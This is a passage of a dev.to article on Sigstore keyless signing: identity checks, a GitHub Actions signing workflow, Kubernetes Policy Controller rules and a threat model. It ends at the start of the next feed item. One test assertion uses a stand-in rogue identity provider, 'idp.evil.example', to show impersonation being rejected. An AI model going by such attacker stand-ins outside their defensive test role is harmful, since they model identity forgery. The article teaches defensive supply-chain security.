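def identity_ok(cert_san, cert_oidc_issuer, want_identity, want_issuer):
    # BOTH must match exactly: the SAN alone is not enough, because two
    # different IdPs could each vouch for the same email string.
    return cert_san == want_identity and cert_oidc_issuer == want_issuer

assert identity_ok(
    "you@gmail.com", "https://accounts.google.com",
    "you@gmail.com", "https://accounts.google.com",
)
# Same email, different issuer: reject, or a rogue IdP could impersonate anyone.
assert not identity_ok(
    "you@gmail.com", "https://idp.evil.example",
    "you@gmail.com", "https://accounts.google.com",
)
```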

&lt;p&gt;If all checks pass, you have irrefutable cryptographic proof that "This exact image was signed by this specific identity, authenticated by this specific OIDC provider, at that exact point in time."&lt;/p&gt;




&lt;h2&gt;
  
  
  7. GitHub Actions Integration: Total Automation
&lt;/h2&gt;

&lt;p&gt;Where this architecture truly screams is inside a CI/CD pipeline. GitHub Actions natively provides its own OIDC Provider (&lt;code&gt;https://token.actions.githubusercontent.com&lt;/code&gt;). Cosign automatically detects it, bypasses the browser popup, and executes a fully headless keyless signing flow.&lt;/p&gt;

&lt;h3&gt;
  
  
  Workflow Configuration
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Build and Sign&lt;/span&gt;
&lt;span class="na"&gt;on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;push&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;branches&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;main&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

&lt;span class="na"&gt;jobs&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;build-sign&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;runs-on&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ubuntu-latest&lt;/span&gt;
    &lt;span class="na"&gt;permissions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;id-token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# Required to mint the OIDC token&lt;/span&gt;
      &lt;span class="na"&gt;packages&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;write&lt;/span&gt;    &lt;span class="c1"&gt;# Required to push to GHCR&lt;/span&gt;
      &lt;span class="na"&gt;contents&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;read&lt;/span&gt;

    &lt;span class="na"&gt;steps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;actions/checkout@v4&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sigstore/cosign-installer@v3&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Login to GHCR&lt;/span&gt;
        &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;docker/login-action@v3&lt;/span&gt;
        &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;registry&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ghcr.io&lt;/span&gt;
          &lt;span class="na"&gt;username&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ github.actor }}&lt;/span&gt;
          &lt;span class="na"&gt;password&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;${{ secrets.GITHUB_TOKEN }}&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Build and Push&lt;/span&gt;
        &lt;span class="na"&gt;id&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;build-push&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
          &lt;span class="s"&gt;IMAGE="ghcr.io/${{ github.repository }}:${{ github.sha }}"&lt;/span&gt;
          &lt;span class="s"&gt;docker build -t "$IMAGE" .&lt;/span&gt;
          &lt;span class="s"&gt;docker push "$IMAGE"&lt;/span&gt;
          &lt;span class="s"&gt;DIGEST=$(docker inspect --format='{{index .RepoDigests 0}}' "$IMAGE")&lt;/span&gt;
          &lt;span class="s"&gt;echo "digest=$DIGEST" &amp;gt;&amp;gt; "$GITHUB_OUTPUT"&lt;/span&gt;

      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Sign with Cosign (keyless)&lt;/span&gt;
        &lt;span class="na"&gt;run&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cosign sign --yes ${{ steps.build-push.outputs.digest }}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Adding &lt;code&gt;permissions.id-token: write&lt;/code&gt; is all it takes. Cosign detects it's running inside CI, grabs the token, and does its job.&lt;/p&gt;
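&lt;p&gt;Under the hood, "grabs the token" means reading the two environment variables GitHub injects when &lt;code&gt;id-token: write&lt;/code&gt; is set (&lt;code&gt;ACTIONS_ID_TOKEN_REQUEST_URL&lt;/code&gt; and &lt;code&gt;ACTIONS_ID_TOKEN_REQUEST_TOKEN&lt;/code&gt;) and requesting a JWT with the &lt;code&gt;sigstore&lt;/code&gt; audience. A sketch of that exchange (only runnable inside an Actions job, so the URL-building helper carries the testable logic):&lt;/p&gt;

```python
import json
import os
import urllib.request
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

def token_request_url(base_url, audience):
    # Append audience=... to the runner-provided URL, which already
    # carries its own query string.
    parts = urlsplit(base_url)
    query = parse_qsl(parts.query) + [("audience", audience)]
    return urlunsplit(parts._replace(query=urlencode(query)))

def fetch_actions_oidc_token(audience="sigstore"):
    # Only works inside a GitHub Actions job with id-token: write.
    url = token_request_url(os.environ["ACTIONS_ID_TOKEN_REQUEST_URL"], audience)
    req = urllib.request.Request(url, headers={
        "Authorization": "Bearer " + os.environ["ACTIONS_ID_TOKEN_REQUEST_TOKEN"],
    })
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["value"]
```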

&lt;h3&gt;
  
  
  Verifying the CI Signature
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;cosign verify &lt;span class="se"&gt;\&lt;/span&gt;
  ghcr.io/myorg/myrepo@sha256:abc123... &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/myorg/myrepo/.github/workflows/build.yml@refs/heads/main"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://token.actions.githubusercontent.com"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This verification command guarantees one thing: &lt;strong&gt;"This image was irrefutably built and signed by the build.yml workflow inside the myorg/myrepo repository, triggered from the main branch."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiz4ijmqoovwnmfjlxqy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Feiz4ijmqoovwnmfjlxqy.png" alt="verify" width="472" height="802"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  8. Kubernetes Policy Controller: Forcing the Rules
&lt;/h2&gt;

&lt;p&gt;Once you can sign things, the next logical step is "refuse to deploy anything that isn't signed." While I showed off Kyverno in the last article, the Sigstore project itself maintains the &lt;strong&gt;Policy Controller&lt;/strong&gt;, a dedicated Admission Webhook.&lt;/p&gt;

&lt;h3&gt;
  
  
  How It Works
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvgaj22dnmqbujgsk9su.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdvgaj22dnmqbujgsk9su.png" alt="How it Works" width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Setup
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Install Policy Controller&lt;/span&gt;
helm repo add sigstore https://sigstore.github.io/helm-charts
helm &lt;span class="nb"&gt;install &lt;/span&gt;policy-controller sigstore/policy-controller &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-n&lt;/span&gt; cosign-system &lt;span class="nt"&gt;--create-namespace&lt;/span&gt;

&lt;span class="c"&gt;# Opt-in your target namespace&lt;/span&gt;
kubectl label namespace default policy.sigstore.dev/include&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nb"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  ClusterImagePolicy: Defining the Law
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;policy.sigstore.dev/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterImagePolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;require-github-actions-signed&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;images&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;glob&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ghcr.io/myorg/**"&lt;/span&gt;
  &lt;span class="na"&gt;authorities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;keyless&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;url&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://fulcio.sigstore.dev&lt;/span&gt;
        &lt;span class="na"&gt;identities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;issuer&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://token.actions.githubusercontent.com"&lt;/span&gt;
          &lt;span class="na"&gt;subject&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://github.com/myorg/myrepo/.github/workflows/build.yml@refs/heads/main"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This policy dictates: &lt;strong&gt;"Images under &lt;code&gt;ghcr.io/myorg/&lt;/code&gt; are ONLY allowed to run if they were signed by the build.yml workflow on the main branch via GitHub Actions."&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Evaluation logic:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If multiple &lt;code&gt;ClusterImagePolicy&lt;/code&gt; resources match, &lt;strong&gt;all&lt;/strong&gt; of them must be satisfied (AND).&lt;/li&gt;
&lt;li&gt;If a single policy has multiple &lt;code&gt;authorities&lt;/code&gt;, &lt;strong&gt;any one&lt;/strong&gt; of them will satisfy it (OR).&lt;/li&gt;
&lt;/ul&gt;
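&lt;p&gt;That AND-across-policies, OR-across-authorities split is easy to get backwards, so here's a toy model of it (assuming the policies have already been filtered down to the ones whose image glob matched):&lt;/p&gt;

```python
def authority_ok(authority, signer):
    # Within one authority, any listed identity may match.
    return any(
        ident["issuer"] == signer["issuer"] and ident["subject"] == signer["subject"]
        for ident in authority["identities"]
    )

def admit(matching_policies, signer):
    # Every matching policy must be satisfied (AND) ...
    return all(
        # ... but inside a policy, any single authority suffices (OR).
        any(authority_ok(a, signer) for a in policy["authorities"])
        for policy in matching_policies
    )

ci = {"issuer": "https://token.actions.githubusercontent.com",
      "subject": "https://github.com/myorg/myrepo/.github/workflows/build.yml@refs/heads/main"}

policy_a = {"authorities": [{"identities": [ci]}]}
policy_b = {"authorities": [{"identities": [
    {"issuer": ci["issuer"], "subject": "release-workflow-only"}]}]}

assert admit([policy_a], ci)                # one matching policy, satisfied
assert not admit([policy_a, policy_b], ci)  # policy_b also matched: AND fails
```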

&lt;h3&gt;
  
  
  Enforcing SBOM Attestations
&lt;/h3&gt;

&lt;p&gt;The SBOM Attestations we covered previously can also be enforced here. You can write custom policies in CUE or Rego.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;policy.sigstore.dev/v1beta1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ClusterImagePolicy&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;require-vuln-scan-passed&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;images&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;glob&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;ghcr.io/myorg/**"&lt;/span&gt;
  &lt;span class="na"&gt;authorities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;keyless&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;url&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://fulcio.sigstore.dev&lt;/span&gt;
        &lt;span class="na"&gt;identities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;issuer&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://token.actions.githubusercontent.com"&lt;/span&gt;
            &lt;span class="na"&gt;subject&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://github.com/myorg/myrepo/.github/workflows/build.yml@refs/heads/main"&lt;/span&gt;
      &lt;span class="na"&gt;attestations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;vuln-scan&lt;/span&gt;
          &lt;span class="na"&gt;predicateType&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;https://cosign.sigstore.dev/attestation/vuln/v1&lt;/span&gt;
          &lt;span class="na"&gt;policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
            &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cue&lt;/span&gt;
            &lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
              &lt;span class="s"&gt;predicateType: "cosign.sigstore.dev/attestation/vuln/v1"&lt;/span&gt;
              &lt;span class="s"&gt;predicate: {&lt;/span&gt;
                &lt;span class="s"&gt;scanner: {&lt;/span&gt;
                  &lt;span class="s"&gt;result: "PASSED"&lt;/span&gt;
                &lt;span class="s"&gt;}&lt;/span&gt;
              &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This policy creates an ironclad rule: &lt;strong&gt;"Only deploy images that carry a cryptographically signed attestation proving they passed the vulnerability scanner."&lt;/strong&gt; You can enforce this directly at the Kubernetes Admission Webhook level.&lt;/p&gt;
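&lt;p&gt;As a minimal sketch of what that gate evaluates: the real policy-controller runs the CUE policy above against the verified attestation payload; the dict shape and helper below are illustrative stand-ins, not its actual API.&lt;/p&gt;

```python
# Illustrative stand-in for the CUE rule above: admit only attestations whose
# predicate says the vulnerability scanner passed. Not the policy-controller API.
REQUIRED_PREDICATE = "https://cosign.sigstore.dev/attestation/vuln/v1"

def admits(attestation):
    """Mirror the CUE policy: matching predicateType and scanner.result PASSED."""
    if attestation.get("predicateType") != REQUIRED_PREDICATE:
        return False
    scanner = attestation.get("predicate", {}).get("scanner", {})
    return scanner.get("result") == "PASSED"

passed = {"predicateType": REQUIRED_PREDICATE,
          "predicate": {"scanner": {"result": "PASSED"}}}
failed = {"predicateType": REQUIRED_PREDICATE,
          "predicate": {"scanner": {"result": "FAILED"}}}
print(admits(passed))  # True
print(admits(failed))  # False
```

&lt;p&gt;Anything without a verified, matching attestation simply never reaches the cluster.&lt;/p&gt;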




&lt;h2&gt;
  
  
  9. Expanding the Ecosystem: Beyond Containers
&lt;/h2&gt;

&lt;p&gt;Sigstore cut its teeth on container images, but as of 2026, its reach has exploded.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PyPI (Python)&lt;/strong&gt;: Sigstore-based attestations hit GA in November 2024. Projects using Trusted Publishing (GitHub Actions OIDC to PyPI) automatically get Sigstore signatures applied with zero workflow changes. Currently, roughly 5% of the top 360 packages are on board, and they have already published over 20,000 attestations.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;npm (Node.js)&lt;/strong&gt;: Trusted Publishing went GA in July 2025. Publishing via OIDC automatically attaches a Sigstore provenance attestation to the package.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Maven Central (Java)&lt;/strong&gt;: Rolled out native support for Sigstore signatures in January 2025.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Rekor Monitor&lt;/strong&gt;: OpenSSF is actively hardening Rekor Monitor for production use. It handles Rekor v2, certificate validation, and TUF integration. We've already seen cases where malicious package releases were caught purely by monitoring Rekor logs.&lt;/p&gt;




&lt;h2&gt;
  
  
  10. Threat Modeling: What Breaks When Things Go Wrong?
&lt;/h2&gt;

&lt;p&gt;Sigstore is a powerhouse, but it's not magic. Here is a breakdown of what happens if its core components get compromised, and the mitigations in place.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Threat&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;th&gt;Mitigation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OIDC Provider Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Rogue ID Tokens mint certs under someone else's identity.&lt;/td&gt;
&lt;td&gt;CT Logs record all certs. Identity owners can spot anomalies by monitoring the logs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fulcio CA Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Attacker mints arbitrary certificates.&lt;/td&gt;
&lt;td&gt;Unlogged certs are rejected by clients. The community monitors CT logs to catch it.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rekor Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Logs altered or fake entries injected.&lt;/td&gt;
&lt;td&gt;Blocked by v2 native Witnessing, Merkle consistency proofs, and signed Root Hashes.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;TUF Root Compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The entire root of trust is swapped out.&lt;/td&gt;
&lt;td&gt;Requires compromising 3-of-5 hardware keys. Audited via highly public Key Ceremonies.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Ephemeral Key Theft&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Attackers forge signatures.&lt;/td&gt;
&lt;td&gt;Keys live in RAM for seconds. Cert dies in 10 minutes. The signature must already be in Rekor.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The brilliance here is that &lt;strong&gt;a single component failure does not cause a systemic collapse.&lt;/strong&gt; If Fulcio goes rogue, the CT Log catches it. If Rekor is compromised, the Witnesses catch it. If the OIDC provider is breached, log monitoring catches it.&lt;/p&gt;
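&lt;p&gt;The last row of that table boils down to a simple temporal check. Here's a hedged sketch (the function and argument names are mine, not the real Fulcio/Rekor schema): a signature only counts if Rekor's integrated timestamp lands inside the certificate's 10-minute validity window.&lt;/p&gt;

```python
from datetime import datetime, timedelta, timezone

CERT_TTL = timedelta(minutes=10)  # Fulcio's short-lived certificate lifetime

def signing_event_ok(cert_not_before, rekor_integrated_time):
    """True only if Rekor logged the signature while the cert was alive."""
    return cert_not_before <= rekor_integrated_time <= cert_not_before + CERT_TTL

issued = datetime(2026, 5, 10, 7, 0, tzinfo=timezone.utc)
print(signing_event_ok(issued, issued + timedelta(minutes=3)))  # True: signed in-window
print(signing_event_ok(issued, issued + timedelta(hours=2)))    # False: too late
```

&lt;p&gt;Even a thief holding the raw private key gains nothing after the window closes: any new signature fails this check.&lt;/p&gt;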




&lt;h2&gt;
  
  
  11. Legacy PKI vs. Sigstore
&lt;/h2&gt;

&lt;p&gt;Let's wrap up by comparing Sigstore against legacy code-signing PKI.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Legacy Code Signing PKI&lt;/th&gt;
&lt;th&gt;Sigstore&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Key Management&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Hoard keys in HSM/Vault forever.&lt;/td&gt;
&lt;td&gt;Generate ephemerally, wipe instantly. Zero management.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Identity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Tied to an organization (costs money, requires corporate entity).&lt;/td&gt;
&lt;td&gt;Tied to your OIDC ID (Google/GitHub, free).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cert Lifespan&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Years. Requires complex CRL/OCSP.&lt;/td&gt;
&lt;td&gt;10 minutes. Revocation is obsolete.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cost&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Commercial CAs: $200-$500+/year.&lt;/td&gt;
&lt;td&gt;Free (Public Good Instance).&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Transparency&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;None. Completely opaque.&lt;/td&gt;
&lt;td&gt;Every signature immortalized in Rekor.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Verification UX&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;You have to manually fetch the signer's public key.&lt;/td&gt;
&lt;td&gt;Just specify the &lt;code&gt;identity&lt;/code&gt; and &lt;code&gt;issuer&lt;/code&gt;.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;OSS Compatibility&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Terrible. No corporate entity, key distribution nightmare.&lt;/td&gt;
&lt;td&gt;Flawless. Uses developer IDs, perfectly automatable in CI.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Legacy PKI asked, "&lt;strong&gt;Do you trust this specific key?&lt;/strong&gt;" Sigstore fundamentally shifts this to, "&lt;strong&gt;Do you trust this specific identity, at this exact point in time?&lt;/strong&gt;" Transparency logs deliver the temporal proof, and short-lived certificates eradicate the nightmare of key lifecycle management.&lt;/p&gt;




&lt;h2&gt;
  
  
  12. Conclusion
&lt;/h2&gt;

&lt;p&gt;We just tore apart the engine that makes &lt;code&gt;cosign sign&lt;/code&gt; feel like magic.&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Fulcio&lt;/strong&gt; verifies your OIDC ID Token and mints a certificate that self-destructs in 10 minutes. It logs everything to a CT Log, meaning CA compromises can't hide.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Rekor&lt;/strong&gt; forces every signing event into an immutable Merkle Tree. Inclusion proofs and signed timestamps permanently testify that the signature happened while the cert was alive.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;TUF&lt;/strong&gt; defends the root of trust with 3-of-5 threshold signatures and chained verification. Even a hacked CDN can't force-feed you a fake root cert.&lt;/li&gt;
&lt;li&gt;Hook this into the &lt;strong&gt;GitHub Actions OIDC Provider&lt;/strong&gt;, and you get completely automated, headless CI/CD signing.&lt;/li&gt;
&lt;li&gt;Slap down &lt;strong&gt;Policy Controller&lt;/strong&gt; on your cluster, and you establish a hard deployment gate.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;They call Sigstore the "Let's Encrypt of code signing." Just like Let's Encrypt made HTTPS the default, Sigstore is turning ubiquitous code signing into the new standard. The fact that npm, PyPI, and Maven Central are aggressively adopting it proves the momentum is real.&lt;/p&gt;

&lt;p&gt;The next time you hit &lt;code&gt;cosign sign&lt;/code&gt;, take a second to appreciate the insane engineering behind it. Fulcio minting a 10-minute cert, Rekor hashing the log into a Merkle tree, and TUF stubbornly defending the root—all so you can throw your keys into the void.&lt;/p&gt;

</description>
      <category>security</category>
      <category>sigstore</category>
      <category>kubernetes</category>
      <category>devops</category>
    </item>
    <item>
      <title>xDS Deep Dive: Dissecting the "Nervous System" of the Service Mesh</title>
      <dc:creator>kt</dc:creator>
      <pubDate>Mon, 20 Apr 2026 15:40:41 +0000</pubDate>
      <link>https://dev.to/kanywst/xds-deep-dive-dissecting-the-nervous-system-of-the-service-mesh-3m5i</link>
      <guid>https://dev.to/kanywst/xds-deep-dive-dissecting-the-nervous-system-of-the-service-mesh-3m5i</guid>
      <description>&lt;h1&gt;
  
  
  Introduction
&lt;/h1&gt;

